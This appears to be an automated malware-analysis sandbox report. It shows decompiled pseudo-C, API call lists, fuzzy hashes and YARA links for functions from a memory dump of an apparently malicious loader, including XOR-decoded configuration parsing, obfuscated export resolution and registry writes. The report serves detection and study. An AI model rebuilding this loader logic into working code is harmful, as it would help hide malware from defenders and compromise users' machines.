Instruction ID: a060665560fef8f29725a685e79e49e3478eafb3472eefd846c7dae622d5ba05
Opcode Fuzzy Hash: 1d33067ae97979da6a929c1dcbdf6e5f33510b9c75bd3dded1351bcb088efd2b
Instruction Fuzzy Hash: D7D191B6D012699FCB01CFE4C980ADEBBB6BF49314F24015AE856B7245DA30AD16CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00DC58CA, Relevance: 9.2, APIs: 6, Instructions: 190
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00DC58CA(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				void* _t46;
				void* _t47;
				signed int _t49;
				signed int _t53;
				signed int _t57;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				void* _t74;
				intOrPtr _t90;

				_t75 = __ecx;
				_t20 =  *0xdcd22c; // 0x63699bc3
				if(E00DC33AC( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xdcd280 = _v12;
				}
				_t25 =  *0xdcd22c; // 0x63699bc3
				if(E00DC33AC( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L48;
				} else {
					_t74 = _v12;
					if(_t74 == 0) {
						_t31 = 0;
					} else {
						_t69 =  *0xdcd22c; // 0x63699bc3
						_t31 = E00DC1273(_t75, _t74, _t69 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xdcd1f8 = _v8;
						}
					}
					if(_t74 == 0) {
						_t32 = 0;
					} else {
						_t65 =  *0xdcd22c; // 0x63699bc3
						_t32 = E00DC1273(_t75, _t74, _t65 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xdcd1fc = _v8;
						}
					}
					if(_t74 == 0) {
						_t33 = 0;
					} else {
						_t61 =  *0xdcd22c; // 0x63699bc3
						_t33 = E00DC1273(_t75, _t74, _t61 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xdcd200 = _v8;
						}
					}
					if(_t74 == 0) {
						_t34 = 0;
					} else {
						_t57 =  *0xdcd22c; // 0x63699bc3
						_t34 = E00DC1273(_t75, _t74, _t57 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xdcd004 = _v8;
						}
					}
					if(_t74 == 0) {
						_t35 = 0;
					} else {
						_t53 =  *0xdcd22c; // 0x63699bc3
						_t35 = E00DC1273(_t75, _t74, _t53 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t75 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xdcd02c = _v8;
						}
					}
					if(_t74 == 0) {
						_t36 = 0;
					} else {
						_t49 =  *0xdcd22c; // 0x63699bc3
						_t36 = E00DC1273(_t75, _t74, _t49 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t46 = 0x10;
						_t47 = E00DC73B3(_t46);
						if(_t47 != 0) {
							_push(_t47);
							E00DC10E4();
						}
					}
					if(_t74 == 0) {
						_t37 = 0;
					} else {
						_t44 =  *0xdcd22c; // 0x63699bc3
						_t37 = E00DC1273(_t75, _t74, _t44 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00DC73B3(0, _t37) != 0) {
						_t90 =  *0xdcd2dc; // 0x5119630
						E00DC5B10(_t90 + 4, _t42);
					}
					_t38 =  *0xdcd230; // 0x434a5a8
					_t18 = _t38 + 0xdce2d2; // 0x511887a
					_t19 = _t38 + 0xdce7c4; // 0x6976612e
					 *0xdcd27c = _t18;
					 *0xdcd2f4 = _t19;
					HeapFree( *0xdcd1f0, 0, _t74);
					L48:
					return 0;
				}
			}

0x00dc58ca
0x00dc58cd
0x00dc58ed
0x00dc58fb
0x00dc58fb
0x00dc5900
0x00dc591a
0x00dc5abd
0x00dc5abf
0x00000000
0x00dc5920
0x00dc5920
0x00dc5927
0x00dc593d
0x00dc5929
0x00dc5929
0x00dc5936
0x00dc5936
0x00dc5947
0x00dc5949
0x00dc5953
0x00dc5958
0x00dc5958
0x00dc5953
0x00dc595f
0x00dc5975
0x00dc5961
0x00dc5961
0x00dc596e
0x00dc596e
0x00dc5979
0x00dc597b
0x00dc5985
0x00dc598a
0x00dc598a
0x00dc5985
0x00dc5991
0x00dc59a7
0x00dc5993
0x00dc5993
0x00dc59a0
0x00dc59a0
0x00dc59ab
0x00dc59ad
0x00dc59b7
0x00dc59bc
0x00dc59bc
0x00dc59b7
0x00dc59c3
0x00dc59d9
0x00dc59c5
0x00dc59c5
0x00dc59d2
0x00dc59d2
0x00dc59dd
0x00dc59df
0x00dc59e9
0x00dc59ee
0x00dc59ee
0x00dc59e9
0x00dc59f5
0x00dc5a0b
0x00dc59f7
0x00dc59f7
0x00dc5a04
0x00dc5a04
0x00dc5a0f
0x00dc5a11
0x00dc5a1b
0x00dc5a20
0x00dc5a20
0x00dc5a1b
0x00dc5a27
0x00dc5a3d
0x00dc5a29
0x00dc5a29
0x00dc5a36
0x00dc5a36
0x00dc5a41
0x00dc5a43
0x00dc5a46
0x00dc5a47
0x00dc5a4e
0x00dc5a50
0x00dc5a51
0x00dc5a51
0x00dc5a4e
0x00dc5a58
0x00dc5a6e
0x00dc5a5a
0x00dc5a5a
0x00dc5a67
0x00dc5a67
0x00dc5a72
0x00dc5a80
0x00dc5a8a
0x00dc5a8a
0x00dc5a8f
0x00dc5a95
0x00dc5aa2
0x00dc5aa8
0x00dc5aae
0x00dc5ab3
0x00dc5ac0
0x00dc5ac4
0x00dc5ac4

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC594F
StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC5981
StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC59B3
StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC59E5
StrToIntExA.SHLWAPI(00000000,00000000,00DC79CC,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC5A17
HeapFree.KERNEL32(00000000,?,?,00DC79CC,63699BC3,?,00DC79CC,63699BC3,E8FA7DD7,00DCD00C,7742C740,?,?,00DC79CC), ref: 00DC5AB3

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0af3b4ae0f1c6b44d591b2f52dcd47df474b01a130b87bfb0ae3714a93712f36
Instruction ID: b94953b6f30af12c0263da06c52e915c77fb0a1f1a7df7b0a19951042cfc65d9
Opcode Fuzzy Hash: 0af3b4ae0f1c6b44d591b2f52dcd47df474b01a130b87bfb0ae3714a93712f36
Instruction Fuzzy Hash: 55519775A00617EACB11DBB5EC85E5BB7A9D7483507684A69F002D7219EA30FD809E38

Uniqueness

Uniqueness Score: -1.00%

Function 00DC83EC, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00DC8448
SysAllocString.OLEAUT32(0070006F), ref: 00DC845C
SysAllocString.OLEAUT32(00000000), ref: 00DC846E
SysFreeString.OLEAUT32(00000000), ref: 00DC84D2
SysFreeString.OLEAUT32(00000000), ref: 00DC84E1
SysFreeString.OLEAUT32(00000000), ref: 00DC84EC

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: d19b6337c08567dc3a1994738bd38aac24dcce890bcd28bddc475935398319a7
Instruction ID: 54ba04ac564ffcefb1a819fc9998424510d6fe58f96ecd0d26b53ebcbfa60804
Opcode Fuzzy Hash: d19b6337c08567dc3a1994738bd38aac24dcce890bcd28bddc475935398319a7
Instruction Fuzzy Hash: D9312E32D1060BABDB01DFA8C844E9FB7BAAF49311F154469ED15EB220DB719D06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DC40AF, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DC40AF(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00DC75C4(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xdcd230; // 0x434a5a8
					_t1 = _t23 + 0xdce11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xdcd230; // 0x434a5a8
					_t2 = _t26 + 0xdce787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00DC4C31(_t54);
					} else {
						_t30 =  *0xdcd230; // 0x434a5a8
						_t5 = _t30 + 0xdce774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xdcd230; // 0x434a5a8
							_t7 = _t33 + 0xdce797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xdcd230; // 0x434a5a8
								_t9 = _t36 + 0xdce756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xdcd230; // 0x434a5a8
									_t11 = _t39 + 0xdce7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00DC4F73(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00dc40be
0x00dc40c2
0x00dc4184
0x00dc40c8
0x00dc40c8
0x00dc40cd
0x00dc40e0
0x00dc40e2
0x00dc40e7
0x00dc40ef
0x00dc40f6
0x00dc40fa
0x00dc40fd
0x00dc417c
0x00dc417d
0x00dc40ff
0x00dc40ff
0x00dc4104
0x00dc410c
0x00dc4110
0x00dc4113
0x00000000
0x00dc4115
0x00dc4115
0x00dc411a
0x00dc4122
0x00dc4126
0x00dc4129
0x00000000
0x00dc412b
0x00dc412b
0x00dc4130
0x00dc4138
0x00dc413c
0x00dc413f
0x00000000
0x00dc4141
0x00dc4141
0x00dc4146
0x00dc414e
0x00dc4152
0x00dc4155
0x00000000
0x00dc4157
0x00dc415d
0x00dc4162
0x00dc4169
0x00dc4170
0x00dc4173
0x00000000
0x00dc4175
0x00dc4178
0x00dc4178
0x00dc4173
0x00dc4155
0x00dc413f
0x00dc4129
0x00dc4113
0x00dc40fd
0x00dc4192

APIs

Part of subcall function 00DC75C4: RtlAllocateHeap.NTDLL(00000000,00000000,00DC5068), ref: 00DC75D0

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00DC7E5B,?,?,?,?,00000000,00000000), ref: 00DC40D4
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00DC40F6
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00DC410C
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00DC4122
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00DC4138
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00DC414E

Part of subcall function 00DC4F73: memset.NTDLL ref: 00DC4FF2

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 4c7d6e7aa4ebd643b7545df3a521395aee872128fc5faa92131cd4d035cfa3ce
Instruction ID: 42eb6d6ba62e2ea5bce09606561f6ecf0f4219d3c48dc7b4aa73e3bb54a9d4da
Opcode Fuzzy Hash: 4c7d6e7aa4ebd643b7545df3a521395aee872128fc5faa92131cd4d035cfa3ce
Instruction Fuzzy Hash: 4F214CB150070BAFDB10DFA9CD84E6ABBECEB193407094569E549CB251E735E901CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 70296331, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,702962A1,7029443D,70293CD7), ref: 7029633F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7029634D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 70296366
SetLastError.KERNEL32(00000000,?,702962A1,7029443D,70293CD7), ref: 702963B8

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: eb0c4c332fe0ee45b00492d607b2bcfb2d569901029532b0417ca3ea41bf15f5
Instruction ID: 50009566beab13a19045c639180217a405e2d856094ecd8fd7542b202352a7d1
Opcode Fuzzy Hash: eb0c4c332fe0ee45b00492d607b2bcfb2d569901029532b0417ca3ea41bf15f5
Instruction Fuzzy Hash: 4C0124332393125EE7016A766C8DB2F36F9DB09A34B31022DF912B42F0EE115C20AA4C

Uniqueness

Uniqueness Score: -1.00%

Function 00DCA360, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00DCA360(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0xdcd2ec);
					_t96 = 0x80000002;
					L6:
					_t60 = E00DC745D(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E00DC8557(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E00DC4C31(_a8);
						goto L29;
					}
					_t65 =  *0xdcd230; // 0x434a5a8
					_t16 = _t65 + 0xdce908; // 0x65696c43
					_t68 = E00DC745D(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d00dcc0
						if(E00DC7325( *_t33, _t96, _a8,  *0xdcd2e4,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0xdcd230; // 0x434a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0xdcea0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0xdce927; // 0x55434b48
								_t73 = _t34;
							}
							if(E00DC7D0C( &_a24, _t73,  *0xdcd2e4,  *0xdcd2e8,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0xdcd230; // 0x434a5a8
									_t44 = _t75 + 0xdce893; // 0x74666f53
									_t78 = E00DC745D(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d00dcc0
										E00DC3FF3( *_t47, _t96, _a8,  *0xdcd2e8, _a24);
										_t49 = _t105 + 0x10; // 0x3d00dcc0
										E00DC3FF3( *_t49, _t96, _t103,  *0xdcd2e0, _a16);
										E00DC4C31(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d00dcc0
									E00DC3FF3( *_t40, _t96, _a8,  *0xdcd2e8, _a24);
									_t43 = _t105 + 0x10; // 0x3d00dcc0
									E00DC3FF3( *_t43, _t96, _a8,  *0xdcd2e0, _a16);
								}
								if( *_t105 != 0) {
									E00DC4C31(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d00dcc0
					if(E00DC51C4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d00dcc0
							E00DC7325( *_t26, _t96, _a8, _a24, _t104);
						}
						E00DC4C31(_t104);
						_t102 = _a16;
					}
					E00DC4C31(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0xdcd2ec);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x00dca360
0x00dca369
0x00dca370
0x00dca375
0x00dca3e4
0x00dca3ea
0x00dca3ef
0x00dca3f8
0x00dca3ff
0x00dca402
0x00dca576
0x00dca57d
0x00dca57d
0x00dca582
0x00dca584
0x00dca584
0x00dca58d
0x00dca58d
0x00dca408
0x00dca414
0x00dca56c
0x00dca56f
0x00000000
0x00dca56f
0x00dca41a
0x00dca41f
0x00dca428
0x00dca42f
0x00dca432
0x00dca47c
0x00dca47c
0x00dca48f
0x00dca499
0x00dca4a1
0x00dca4a6
0x00dca4b0
0x00dca4b0
0x00dca4a8
0x00dca4a8
0x00dca4a8
0x00dca4a8
0x00dca4d2
0x00dca4da
0x00dca508
0x00dca50d
0x00dca516
0x00dca51b
0x00dca51f
0x00dca551
0x00dca521
0x00dca52e
0x00dca531
0x00dca541
0x00dca544
0x00dca54a
0x00dca54a
0x00dca4dc
0x00dca4e9
0x00dca4ec
0x00dca4fe
0x00dca501
0x00dca501
0x00dca55b
0x00dca567
0x00dca55d
0x00dca560
0x00dca560
0x00dca55b
0x00dca4d2
0x00000000
0x00dca499
0x00dca441
0x00dca44b
0x00dca44d
0x00dca452
0x00dca456
0x00dca458
0x00dca463
0x00dca466
0x00dca466
0x00dca46c
0x00dca471
0x00dca471
0x00dca477
0x00000000
0x00dca477
0x00dca37a
0x00000000
0x00dca3a1
0x00dca3ac
0x00dca3c2
0x00dca3c8
0x00dca3d0
0x00000000
0x00dca3d0

APIs

StrChrA.SHLWAPI(00DC544E,0000005F,00000000,00000000,00000104), ref: 00DCA393
memcpy.NTDLL(?,00DC544E,?), ref: 00DCA3AC
lstrcpy.KERNEL32(?), ref: 00DCA3C2

Part of subcall function 00DC745D: lstrlen.KERNEL32(?,00DCD2E0,74B47FC0,00000000,00DC534B,?,?,?,?,?,00DC70B5,?), ref: 00DC7466
Part of subcall function 00DC745D: mbstowcs.NTDLL ref: 00DC748D
Part of subcall function 00DC745D: memset.NTDLL ref: 00DC749F

Part of subcall function 00DC3FF3: lstrlenW.KERNEL32(00DC544E,?,?,00DCA536,3D00DCC0,80000002,00DC544E,00DC5886,74666F53,4D4C4B48,00DC5886,?,3D00DCC0,80000002,00DC544E,?), ref: 00DC4013

Part of subcall function 00DC4C31: HeapFree.KERNEL32(00000000,00000000,00DC5130,00000000,?,?,00000000,?,?,?,?,?,?,00DC8792,00000000), ref: 00DC4C3D

lstrcpy.KERNEL32(?,00000000), ref: 00DCA3E4

Strings

\, xrefs: 00DCA3C8

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: 3b50fb18901c3385a4b09bc22092f8e16fa3c1003d206be27fdae474e0701c0f
Instruction ID: 195a5ba792ef96ac44489f40cbb5bba920d8447980a120eb453f379bfa822ecd
Opcode Fuzzy Hash: 3b50fb18901c3385a4b09bc22092f8e16fa3c1003d206be27fdae474e0701c0f
Instruction Fuzzy Hash: 3551147251020FAFCF119FA4DD45FAABBBAEB08304F048429FA1597261DB35DA15AF31

Uniqueness

Uniqueness Score: -1.00%

Function 7029F857, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 7029F85C

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: b6bb9cc44e01b28305582d7d57d403f723517ca9bdf98a297b5cd2f9f57a8d61
Instruction ID: 1ba3278f7989111da17d1ba8c1d844d137fd387a29c8836f2f7272c0f783addf
Opcode Fuzzy Hash: b6bb9cc44e01b28305582d7d57d403f723517ca9bdf98a297b5cd2f9f57a8d61
Instruction Fuzzy Hash: 6921B0736202067FE7C19F659C81B5F77AEEF402687204524F81AA7160EB30ED208BA4

Uniqueness

Uniqueness Score: -1.00%

Function 7029953C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,00000044), ref: 7029955C
GetFileType.KERNEL32(00000000,?,00000044), ref: 7029956E
swprintf.LIBCMT ref: 7029958F
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000044), ref: 702995CC

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 70299584

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: 37b95ce0d41be92c9f1c00dae23f47cef1c7926c00b1182c16354afcc0058542
Instruction ID: c5240adb9a875a3bcc99c6579dd257d807f6fe95c58e84f05380db9e626aff0d
Opcode Fuzzy Hash: 37b95ce0d41be92c9f1c00dae23f47cef1c7926c00b1182c16354afcc0058542
Instruction Fuzzy Hash: 811193B35011196BCB119F2E8C44A9F777DEF44220FA14659EA16A7140EE309E568B68

Uniqueness

Uniqueness Score: -1.00%

Function 00DC3267, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00DC3267(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E00DC83EC(_t29, __edi, __eax);
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0xdcd230; // 0x434a5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0xdce4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0xdce92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0xdcd0e4() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x00dc3267
0x00dc326e
0x00dc3272
0x00dc3277
0x00dc327e
0x00dc3281
0x00dc328b
0x00dc3290
0x00dc329c
0x00dc32a3
0x00dc32ad
0x00dc32ad
0x00dc32a5
0x00dc32a5
0x00dc32a5
0x00dc32a5
0x00dc32b3
0x00dc32b6
0x00dc32be
0x00dc32c1
0x00dc32c4
0x00dc32c7
0x00dc32cc
0x00dc32d5
0x00dc32e2
0x00dc32d7
0x00dc32dd
0x00dc32dd
0x00dc32e8
0x00dc32e8
0x00dc32f0

APIs

Part of subcall function 00DC83EC: SysAllocString.OLEAUT32(?), ref: 00DC8448
Part of subcall function 00DC83EC: SysAllocString.OLEAUT32(0070006F), ref: 00DC845C
Part of subcall function 00DC83EC: SysAllocString.OLEAUT32(00000000), ref: 00DC846E
Part of subcall function 00DC83EC: SysFreeString.OLEAUT32(00000000), ref: 00DC84D2

memset.NTDLL ref: 00DC328B
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DC32C7
GetLastError.KERNEL32 ref: 00DC32D7
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DC32E8

Strings

<, xrefs: 00DC329C

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: fcf859391e0e420374093989ec427f0865bf77e854e0a9bbdbe702cfe53a9005
Instruction ID: 3bd86ad82dbf5df0d60372bc8089d99870c92b1e1bbbb4ba7786e424be5d3044
Opcode Fuzzy Hash: fcf859391e0e420374093989ec427f0865bf77e854e0a9bbdbe702cfe53a9005
Instruction Fuzzy Hash: 4C11FA7190031AABDB10DFA9DC85FD9BBBCAB08385F14801AF909E7251D775D6048FB9

Uniqueness

Uniqueness Score: -1.00%

Function 7029E787, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 7029C709: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 7029C73B

_free.LIBCMT ref: 7029E896
_free.LIBCMT ref: 7029E8AD
_free.LIBCMT ref: 7029E8CA
_free.LIBCMT ref: 7029E8E5
_free.LIBCMT ref: 7029E8FC

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 14b0cf5e1745e6b20b26e65504a303ce44a1879d031fce6fb37311801ffb7af1
Instruction ID: 31a15841f4046ada50757526a5f59d4359d72e8545c0d090dfd5045294d91713
